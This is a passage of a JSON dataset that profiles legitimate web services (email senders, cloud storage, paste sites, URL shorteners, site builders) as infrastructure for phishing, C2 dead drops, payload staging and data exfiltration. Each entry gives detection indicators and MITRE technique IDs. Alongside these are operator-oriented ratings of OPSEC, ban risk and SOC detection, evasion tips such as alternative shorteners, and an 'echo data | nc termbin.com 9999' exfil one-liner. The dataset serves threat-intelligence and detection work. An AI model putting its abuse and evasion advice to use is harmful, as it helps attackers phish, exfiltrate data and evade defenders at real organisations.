    "refs": [
      {
        "title": "Webflow Pricing",
        "url": "https://webflow.com/pricing"
      }
    ],
    "detection": [
      "*.webflow.io",
      "*.webflow.com",
      "api.webflow.com",
      "assets.website-files.com",
      "uploads-ssl.webflow.com",
      "Phishing pages on *.webflow.io free subdomains",
      "EvilProxy phishing kit abusing Webflow website builder (Barracuda Sept 2025)"
    ],
    "notes": "Professional phishing pages with CMS API. Form submissions for credential capture. Custom animations for convincing clone sites",
    "customDomain": true,
    "customDomainNotes": "Custom domains on paid plans. Free: *.webflow.io",
    "dataRetention": "Permanent (2 projects free)",
    "rateLimits": "No explicit API limits",
    "maxFileSize": "N/A",
    "logging": "Analytics on paid plans"
  },
  {
    "name": "Evernote",
    "url": "https://evernote.com",
    "category": "Business App",
    "provider": "Evernote",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "evernote.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 1
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Shared note notifications as phishing pretexts. File attachments for payload delivery. Evernote API can be abused for C2 dead drops via note contents. ClickFix campaigns use Evernote links via Google Ads. Windows client has protocol handler RCE (CVE). Declining platform - less security monitoring than active competitors",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Declining platform. Minimal enforcement",
    "verification": "Email only. No CC for free",
    "trust": "medium",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free: 1 device, 60MB uploads/mo, 25MB note size"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM on Business+. OAuth for API"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1567.002",
      "T1102.002",
      "T1204.001"
    ],
    "refs": [
      {
        "title": "Evernote Plans",
        "url": "https://evernote.com/compare-plans"
      },
      {
        "title": "HC3/HHS: Secure Message/Evernote Themed Phishing Campaign (Healthcare Sector Alert)",
        "url": "https://www.hhs.gov/sites/default/files/secure-message-evernote-themed-phishing-campaign-tlpwhite.pdf"
      },
      {
        "title": "Trend Micro: Threat Actors Abuse Evernote for Credential Phishing",
        "url": "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/threat-actors-abuse-evernote-other-shared-platforms-for-credential-phishing"
      },
      {
        "title": "Infosecurity Magazine: Evernote Used for Malware C2 Control",
        "url": "https://www.infosecurity-magazine.com/news/dont-forget-evernote-used-for-malware-control/"
      },
      {
        "title": "THN: ClickFix Campaign Stages Instructions on Evernote Links via Google Ads",
        "url": "https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html"
      },
      {
        "title": "BleepingComputer: Critical Flaw in Evernote Web Clipper Exposed 4.6M Users",
        "url": "https://www.bleepingcomputer.com/news/security/critical-flaw-in-evernote-add-on-exposed-sensitive-data-of-millions/"
      },
      {
        "title": "BankInfoSecurity: Feds Warn Healthcare Entities of Evernote Phishing Scheme",
        "url": "https://www.bankinfosecurity.com/feds-warn-healthcare-entities-evernote-phishing-scheme-a-19791"
      }
    ],
    "detection": [
      "evernote.com/shard/*",
      "evernote.com/l/*"
    ],
    "notes": "Shared notes for phishing pretexts. File attachments for payloads. HC3/HHS federal alert: Evernote-themed phishing campaign targeting healthcare (2022) - victim-org-branded Evernote pages host HTML downloads with credential harvesting trojans. Trend Micro: threat actors use Evernote alongside Canva, Lucidpress as host pages for credential phishing. ClickFix campaigns stage malicious instructions on Evernote links via Google Ads sponsored results to install stealer malware (THN Feb 2026). Infosecurity Magazine: Evernote used as C2 server by hijacking note API for malware communication. CVE-2024: Evernote Windows protocol handler enables arbitrary command execution via crafted URLs (CVSS 8.8). Web Clipper Chrome extension vulnerability exposed data of 4.6M users (Avast 2019). Declining platform with minimal enforcement",
    "customDomain": false,
    "customDomainNotes": "N/A - notes",
    "dataRetention": "Permanent (60MB/mo uploads free)",
    "rateLimits": "API: rate limited",
    "maxFileSize": "25MB per note free",
    "logging": "No audit logs"
  },
  {
    "name": "SendGrid",
    "url": "https://sendgrid.com",
    "category": "Email",
    "provider": "Twilio",
    "signup": "email",
    "signupTime": "~5min",
    "domains": [
      "ct.sendgrid.net"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "api.sendgrid.com/*"
    ],
    "opsec": "medium",
    "opsecNotes": "Requires domain verification for production. Sandbox mode for testing. Trusted sender reputation",
    "socDetection": "unlikely",
    "banRisk": "medium",
    "banNotes": "SendGrid monitors sender reputation via feedback loops. Accounts suspended for phishing",
    "verification": "Email. Domain DNS verification for production sending. CC not required for free",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free forever: 100 emails/day. API-driven. Custom domain required for production"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "SAML on Pro+. API key auth"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.001",
      "T1585.002"
    ],
    "refs": [
      {
        "title": "SendGrid Pricing",
        "url": "https://sendgrid.com/en-us/pricing"
      },
      {
        "title": "SendGrid API",
        "url": "https://docs.sendgrid.com/api-reference"
      }
    ],
    "detection": [
      "*.sendgrid.net",
      "*.sendgrid.com",
      "api.sendgrid.com",
      "api.sendgrid.com/v3/mail/send",
      "smtp.sendgrid.net",
      "email.sendgrid.net",
      "url*.sendgrid.net (click tracking redirects - abused as open redirectors)",
      "o*.sendgrid.net (open tracking pixels)",
      "X-SG-* headers in email (SendGrid origin indicator)",
      "Cofense: SendGrid open redirectors abused for credential harvesting phishing chains",
      "Kaseya: OpenAI invoice scam sent via compromised SendGrid account on openai.com domain",
      "SendGrid accounts with cracked passwords sold to spammers (KrebsOnSecurity)",
      "Self-replicating phishing: stolen SendGrid creds used to send more phishing (Barracuda Sept 2025)"
    ],
    "notes": "100 emails/day free forever. API-driven phishing at scale. Trusted Twilio sender reputation. Domain verification needed for production",
    "customDomain": true,
    "customDomainNotes": "Custom sending domains (DNS verification required)",
    "dataRetention": "30 days email activity",
    "rateLimits": "100 emails/day free",
    "maxFileSize": "30MB per email",
    "logging": "Email Activity Feed, Stats dashboard"
  },
  {
    "name": "Amazon SES",
    "url": "https://aws.amazon.com/ses/",
    "category": "Email",
    "provider": "Amazon",
    "signup": "email+cc",
    "signupTime": "~10min",
    "domains": [
      "amazonses.com",
      "*.amazonaws.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "email.*.amazonaws.com/*"
    ],
    "opsec": "medium",
    "opsecNotes": "Sandbox requires verified recipient emails. Production requires identity verification request to AWS",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "AWS abuse team forwards reports. No auto-ban for normal sending",
    "verification": "AWS account (CC required). Sandbox initially. Production requires AWS approval",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "62k emails/mo free (from EC2). Sandbox: verified recipients only. $0.10/1000 emails after"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "Part of AWS IAM. SAML via Identity Center"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.001",
      "T1585.002"
    ],
    "refs": [
      {
        "title": "Amazon SES Pricing",
        "url": "https://aws.amazon.com/ses/pricing/"
      }
    ],
    "detection": [
      "email-smtp.*.amazonaws.com",
      "ses.*.amazonaws.com",
      "*.amazonses.com",
      "bounce.*.amazonses.com",
      "feedback-*.*.amazonses.com",
      "X-SES-* headers in email (SES origin indicator)",
      "CloudTrail: ses:SendEmail, ses:SendRawEmail API calls",
      "CloudTrail: ses:PutAccountDetails (sandbox escape attempt)",
      "CloudTrail: ses:VerifyEmailIdentity / ses:VerifyDomainIdentity (new sender setup)",
      "CloudTrail: ses:CreateCase (support ticket to raise SES quota)",
      "Wiz: 50k+ phishing emails/day via stolen AWS keys + SES sandbox escape (May 2025)",
      "Multi-region PutAccountDetails calls = SES abuse indicator",
      "Tax-themed phishing lures via compromised SES: 'Your 2024 Tax Form(s) Are Now Ready'"
    ],
    "notes": "Cheap bulk email from trusted Amazon infrastructure. Sandbox mode initially (verified recipients only). Production requires AWS approval. 62k emails/mo free from EC2",
    "customDomain": true,
    "customDomainNotes": "Custom sending domains (DNS/DKIM required)",
    "dataRetention": "CloudWatch metrics 2 weeks",
    "rateLimits": "Sandbox: 200 msg/day. Production: 50k/day",
    "maxFileSize": "10MB per raw message",
    "logging": "CloudTrail, CloudWatch, SES Event Publishing"
  },
  {
    "name": "Backblaze B2",
    "url": "https://backblaze.com",
    "category": "Storage",
    "provider": "Backblaze",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "*.backblazeb2.com"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "S3-compatible API. Far less monitored than AWS S3",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Minimal abuse enforcement",
    "verification": "Email only. No CC for free tier",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 10GB storage, 1GB/day download, S3-compatible API"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": true,
      "notes": "API key auth. MFA via TOTP"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "b2 CLI",
        "url": "https://lolexfil.github.io/#tool=Backblaze%20B2%20CLI%20%28b2.exe%29",
        "note": ""
      },
      {
        "name": "rclone",
        "url": "https://lolexfil.github.io/#tool=rclone",
        "note": ""
      },
      {
        "name": "duplicacy",
        "url": "https://lolexfil.github.io/#tool=duplicacy",
        "note": ""
      },
      {
        "name": "duplicati",
        "url": "https://lolexfil.github.io/#tool=duplicati",
        "note": ""
      },
      {
        "name": "duplicity",
        "url": "https://lolexfil.github.io/#tool=duplicity",
        "note": ""
      },
      {
        "name": "kopia",
        "url": "https://lolexfil.github.io/#tool=kopia",
        "note": ""
      },
      {
        "name": "Arq Backup",
        "url": "https://lolexfil.github.io/#tool=Arq%20Backup",
        "note": ""
      },
      {
        "name": "CloudBerry/MSP360",
        "url": "https://lolexfil.github.io/#tool=CloudBerry%20/%20MSP360%20Backup",
        "note": ""
      },
      {
        "name": "Syncovery",
        "url": "https://lolexfil.github.io/#tool=Syncovery",
        "note": ""
      },
      {
        "name": "Cyberduck",
        "url": "https://lolexfil.github.io/#tool=Cyberduck",
        "note": ""
      }
    ],
    "mitre": [
      "T1567.002",
      "T1105"
    ],
    "refs": [
      {
        "title": "Backblaze B2 Pricing",
        "url": "https://www.backblaze.com/cloud-storage/pricing"
      },
      {
        "title": "lolexfil",
        "url": "https://lolexfil.github.io"
      }
    ],
    "detection": [
      "*.backblazeb2.com",
      "f*.backblazeb2.com",
      "s3.*.backblazeb2.com",
      "api.backblazeb2.com",
      "*.bz2.io",
      "Backblaze B2 + Cloudflare bandwidth alliance (free egress via CF)",
      "S3-compatible API: payload/exfil hosting on B2 buckets"
    ],
    "notes": "10GB free S3-compatible storage. Cheaper and far less monitored than AWS S3. rclone exfil target. Direct download links",
    "customDomain": true,
    "customDomainNotes": "Custom domains via Cloudflare partnership (free bandwidth)",
    "dataRetention": "Permanent (10GB free)",
    "rateLimits": "API: 100 req/s",
    "maxFileSize": "No per-file limit",
    "logging": "Application keys with limited scope. No detailed audit"
  },
  {
    "name": "pCloud",
    "url": "https://pcloud.com",
    "category": "Storage",
    "provider": "pCloud",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "pcloud.com"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Less commonly blocked than Dropbox/GDrive",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Minimal content moderation",
    "verification": "Email only. No CC for free",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free: 10GB (up to 20GB with bonuses). Direct download links. Crypto option for E2E encryption"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "OAuth for API. No enterprise SSO"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "pCloud CLI",
        "url": "https://lolexfil.github.io/#tool=pCloud",
        "note": ""
      },
      {
        "name": "rclone",
        "url": "https://lolexfil.github.io/#tool=rclone",
        "note": ""
      },
      {
        "name": "Cyberduck",
        "url": "https://lolexfil.github.io/#tool=Cyberduck",
        "note": ""
      }
    ],
    "mitre": [
      "T1567.002",
      "T1105"
    ],
    "refs": [
      {
        "title": "pCloud Pricing",
        "url": "https://www.pcloud.com/cloud-storage-pricing-plans.html"
      },
      {
        "title": "lolexfil",
        "url": "https://lolexfil.github.io"
      }
    ],
    "detection": [
      "*.pcloud.com",
      "api.pcloud.com",
      "eapi.pcloud.com",
      "my.pcloud.com",
      "filelink.pcloud.com",
      "pCloud public file links for payload delivery",
      "pCloud Crypto folder: E2E encrypted - platform cannot inspect content"
    ],
    "notes": "10GB free. Direct download links. Less commonly blocked than major cloud storage. Optional E2E encryption (Crypto). rclone exfil target",
    "customDomain": false,
    "customDomainNotes": "N/A - file storage",
    "dataRetention": "Permanent (10GB free)",
    "rateLimits": "API: rate limited",
    "maxFileSize": "No per-file limit",
    "logging": "No audit logs"
  },
  {
    "name": "Transfer.sh",
    "url": "https://transfer.sh",
    "category": "Storage",
    "provider": "Transfer.sh",
    "signup": "none",
    "signupTime": "0",
    "domains": [
      "transfer.sh"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 0,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "medium",
    "opsecNotes": "CLI upload with curl one-liner. Known to some defenders",
    "socDetection": "likely",
    "banRisk": "low",
    "banNotes": "Open source. Self-hostable. No content moderation",
    "verification": "No signup required",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "No account. Max 10GB. Files expire 14 days. curl --upload-file"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": false,
      "notes": "No auth"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "Transfer.sh CLI",
        "url": "https://lolexfil.github.io/#tool=Transfer.sh",
        "note": ""
      },
      {
        "name": "curl",
        "url": "https://lolexfil.github.io/#tool=curl",
        "note": ""
      }
    ],
    "mitre": [
      "T1567.002",
      "T1105"
    ],
    "refs": [
      {
        "title": "Transfer.sh",
        "url": "https://transfer.sh/"
      }
    ],
    "detection": [
      "transfer.sh/*"
    ],
    "notes": "curl one-liner for quick staging/exfil. No signup. Self-hostable alternative available. Known to some SOCs - moderate detection risk",
    "customDomain": false,
    "customDomainNotes": "N/A - file transfer",
    "dataRetention": "14 days expiry",
    "rateLimits": "No rate limit stated",
    "maxFileSize": "10GB per file",
    "logging": "No logging. Self-hostable"
  },
  {
    "name": "Archive.org",
    "url": "https://archive.org",
    "category": "Storage",
    "provider": "Internet Archive",
    "signup": "email",
    "signupTime": "~1min",
    "domains": [
      "archive.org",
      "web.archive.org"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Universally trusted domain. Files persist indefinitely",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Non-profit. Minimal content moderation. Files persist",
    "verification": "Email only. No CC. No phone",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free. Unlimited uploads. Files persist indefinitely. Wayback Machine for cached phishing pretexts"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": false,
      "notes": "Basic email/password auth"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1105",
      "T1583.006"
    ],
    "refs": [
      {
        "title": "Internet Archive",
        "url": "https://archive.org/about/"
      }
    ],
    "detection": [
      "archive.org",
      "*.archive.org",
      "web.archive.org",
      "ia600*.us.archive.org",
      "ia800*.us.archive.org",
      "archive.org/download/*",
      "archive.org/details/*",
      "Permanent public hosting: all uploads persist forever",
      "Payload staging on archive.org/download/* (no expiry, no auth)",
      "Wayback Machine (web.archive.org) for cached phishing page analysis"
    ],
    "notes": "Universally trusted domain. Files persist indefinitely. Wayback Machine URLs for cached versions of legitimate sites as phishing pretexts",
    "customDomain": false,
    "customDomainNotes": "N/A - digital archive",
    "dataRetention": "Permanent (forever)",
    "rateLimits": "No explicit rate limit",
    "maxFileSize": "No per-file limit",
    "logging": "All uploads are permanently public"
  },
  {
    "name": "Rentry.co",
    "url": "https://rentry.co",
    "category": "Paste",
    "provider": "Rentry",
    "signup": "none",
    "signupTime": "0",
    "domains": [
      "rentry.co"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Far less monitored than Pastebin. Editable pastes with edit codes. Markdown support",
    "socDetection": "moderate",
    "banRisk": "low",
    "banNotes": "No enforcement. Anonymous pastes",
    "verification": "No signup required",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free. No account. Editable with edit codes. Markdown. No rate limits"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": false,
      "notes": "No auth"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "text dump services",
        "url": "https://lolexfil.github.io/#tool=Pastebin%20/%20text%20dump%20services",
        "note": ""
      }
    ],
    "mitre": [
      "T1102.002",
      "T1105"
    ],
    "refs": [
      {
        "title": "Rentry.co",
        "url": "https://rentry.co/"
      }
    ],
    "detection": [
      "rentry.co",
      "rentry.co/*",
      "rentry.org",
      "rentry.co/api/raw/*",
      "C2 dead drop: paste content retrieved via /api/raw/ endpoint",
      "Malware config hosting on rentry.co (Lumma Stealer C2 resolution via paste content)"
    ],
    "notes": "Pastebin alternative with far less SOC coverage. Editable pastes with edit codes for persistent C2 dead drops. No signup needed",
    "customDomain": false,
    "customDomainNotes": "N/A - paste service",
    "dataRetention": "Permanent (with edit code)",
    "rateLimits": "No rate limit stated",
    "maxFileSize": "N/A",
    "logging": "No logging"
  },
  {
    "name": "paste.ee",
    "url": "https://paste.ee",
    "category": "Paste",
    "provider": "Paste.ee",
    "signup": "none",
    "signupTime": "0",
    "domains": [
      "paste.ee"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [
      "api.paste.ee/*"
    ],
    "opsec": "low",
    "opsecNotes": "API-friendly. Far less monitored than Pastebin",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "No enforcement",
    "verification": "No signup required. API key optional",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free. No account. API available. Paste expiration configurable"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": false,
      "notes": "API key optional"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "text dump services",
        "url": "https://lolexfil.github.io/#tool=Pastebin%20/%20text%20dump%20services",
        "note": ""
      }
    ],
    "mitre": [
      "T1102.002",
      "T1105"
    ],
    "refs": [
      {
        "title": "Paste.ee API",
        "url": "https://paste.ee/wiki/API"
      }
    ],
    "detection": [
      "paste.ee",
      "paste.ee/p/*",
      "paste.ee/r/*",
      "api.paste.ee",
      "api.paste.ee/v1/pastes",
      "C2 dead drop: paste content as encoded commands or config",
      "Payload staging via paste.ee raw endpoint"
    ],
    "notes": "API-friendly paste service. Less monitored than Pastebin. Configurable paste expiration",
    "customDomain": false,
    "customDomainNotes": "N/A - paste service",
    "dataRetention": "Configurable expiry",
    "rateLimits": "API: rate limited",
    "maxFileSize": "N/A",
    "logging": "No audit logs"
  },
  {
    "name": "Termbin",
    "url": "https://termbin.com",
    "category": "Paste",
    "provider": "Termbin",
    "signup": "none",
    "signupTime": "0",
    "domains": [
      "termbin.com"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Netcat-based. Minimal network fingerprint. No HTTP required",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "No enforcement",
    "verification": "No signup required",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free. No account. Netcat interface: echo data | nc termbin.com 9999"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": false,
      "notes": "No auth"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "text dump services",
        "url": "https://lolexfil.github.io/#tool=Pastebin%20/%20text%20dump%20services",
        "note": ""
      }
    ],
    "mitre": [
      "T1102.002",
      "T1105"
    ],
    "refs": [
      {
        "title": "Termbin",
        "url": "https://termbin.com/"
      }
    ],
    "detection": [
      "termbin.com",
      "termbin.com/*",
      "TCP connections to termbin.com:9999 (netcat-based paste)",
      "cmd: echo DATA | nc termbin.com 9999 (data exfil via terminal)",
      "Termbin URLs in malware droppers as dead drop for C2 config"
    ],
    "notes": "Netcat-based paste. echo data | nc termbin.com 9999. Minimal network fingerprint - no HTTP headers, no browser needed",
    "customDomain": false,
    "customDomainNotes": "N/A - paste service",
    "dataRetention": "Permanent until purged",
    "rateLimits": "No rate limit",
    "maxFileSize": "N/A",
    "logging": "No logging"
  },
  {
    "name": "Bitly",
    "url": "https://bit.ly",
    "category": "Redirector",
    "provider": "Bitly",
    "signup": "email",
    "signupTime": "~1min",
    "domains": [
      "bit.ly"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "api-ssl.bitly.com/*"
    ],
    "opsec": "medium",
    "opsecNotes": "Click tracking provides analytics. Increasingly flagged by email filters",
    "socDetection": "moderate",
    "banRisk": "low",
    "banNotes": "Links disabled on abuse report. Click analytics may be reviewed",
    "verification": "Email only. Free tier available",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 10 links/mo, 5 custom back-halves. API available"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "SAML on Enterprise. OAuth for API"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1204.001"
    ],
    "refs": [
      {
        "title": "Bitly Pricing",
        "url": "https://bitly.com/pages/pricing"
      }
    ],
    "detection": [
      "bit.ly",
      "bit.ly/*",
      "bitly.com",
      "api-ssl.bitly.com",
      "j.mp",
      "Short link redirects masking malicious destinations",
      "Bitly click analytics for phishing campaign tracking",
      "Multiple redirects via bit.ly in email phishing chains"
    ],
    "notes": "URL shortener with click analytics. Increasingly flagged by email filters - consider lnkd.in or t.co as alternatives",
    "customDomain": true,
    "customDomainNotes": "Custom domains on paid plans ($35/mo)",
    "dataRetention": "Permanent (links)",
    "rateLimits": "API: 150 req/min free",
    "maxFileSize": "N/A",
    "logging": "Click analytics, geographic data"
  },
  {
    "name": "TinyURL",
    "url": "https://tinyurl.com",
    "category": "Redirector",
    "provider": "TinyURL",
    "signup": "none",
    "signupTime": "0",
    "domains": [
      "tinyurl.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "medium",
    "opsecNotes": "No account needed. Custom aliases. Less flagged than Bitly",
    "socDetection": "moderate",
    "banRisk": "low",
    "banNotes": "Minimal enforcement",
    "verification": "No signup required",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free. No account. Custom aliases. API available"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": false,
      "notes": "No auth required"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1204.001"
    ],
    "refs": [
      {
        "title": "TinyURL",
        "url": "https://tinyurl.com/app"
      }
    ],
    "detection": [
      "tinyurl.com",
      "tinyurl.com/*",
      "api.tinyurl.com",
      "preview.tinyurl.com",
      "Short link redirects in phishing and smishing (SMS phishing)",
      "TinyURL preview feature bypass by appending /1 to URL"
    ],
    "notes": "No account needed. Custom aliases available. Less flagged than Bitly but still a known shortener",
    "customDomain": false,
    "customDomainNotes": "N/A - URL shortener",
    "dataRetention": "Permanent",
    "rateLimits": "No public API limit",
    "maxFileSize": "N/A",
    "logging": "No analytics on free"
  },
  {
    "name": "Codepen",
    "url": "https://codepen.io",
    "category": "DevOps",
    "provider": "CodePen",
    "signup": "email",
    "signupTime": "~1min",
    "domains": [
      "codepen.io"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 0,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "JavaScript execution environment. Pens run arbitrary client-side code",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "JavaScript pens are normal behavior",
    "verification": "Email only. No CC for free",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: unlimited public pens, 1 project. Pro for private pens"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": false,
      "notes": "GitHub/Twitter login"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1102",
      "T1105"
    ],
    "refs": [
      {
        "title": "CodePen Pricing",
        "url": "https://codepen.io/features/pro"
      }
    ],
    "detection": [
      "codepen.io",
      "*.codepen.io",
      "cdpn.io",
      "codepen.io/*/pen/*",
      "codepen.io/*/full/*",
      "Phishing page hosting on codepen.io/*/full/* (fullscreen view)",
      "JavaScript payload testing/staging on public pens"
    ],
    "notes": "JavaScript execution environment. Pens run arbitrary client-side code. Use for credential phishing pages or payload delivery",
    "customDomain": false,
    "customDomainNotes": "N/A - code playground",
    "dataRetention": "Permanent (public pens)",
    "rateLimits": "No public API",
    "maxFileSize": "N/A",
    "logging": "No audit logs"
  },
  {
    "name": "HubSpot",
    "url": "https://hubspot.com",
    "category": "Business App",
    "provider": "HubSpot",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "hubspot.com",
      "*.hs-sites.com",
      "*.hubspotpagebuilder.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [
      "api.hubapi.com/*"
    ],
    "opsec": "low",
    "opsecNotes": "Free CRM with email sending, landing pages, and forms. Trusted enterprise domain",
    "socDetection": "unlikely",
    "banRisk": "medium",
    "banNotes": "HubSpot monitors email reputation. Phishing via forms may trigger review",
    "verification": "Email only. No CC for free CRM. Phone for sales contact",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free CRM forever: 1M contacts, email marketing 2000/mo, landing pages, forms, API. Marketing Hub trial 14 days"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM on Enterprise. OAuth for API. Private app tokens"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.001",
      "T1566.002",
      "T1598.003"
    ],
    "refs": [
      {
        "title": "HubSpot Pricing",
        "url": "https://www.hubspot.com/pricing"
      },
      {
        "title": "HubSpot API",
        "url": "https://developers.hubspot.com/"
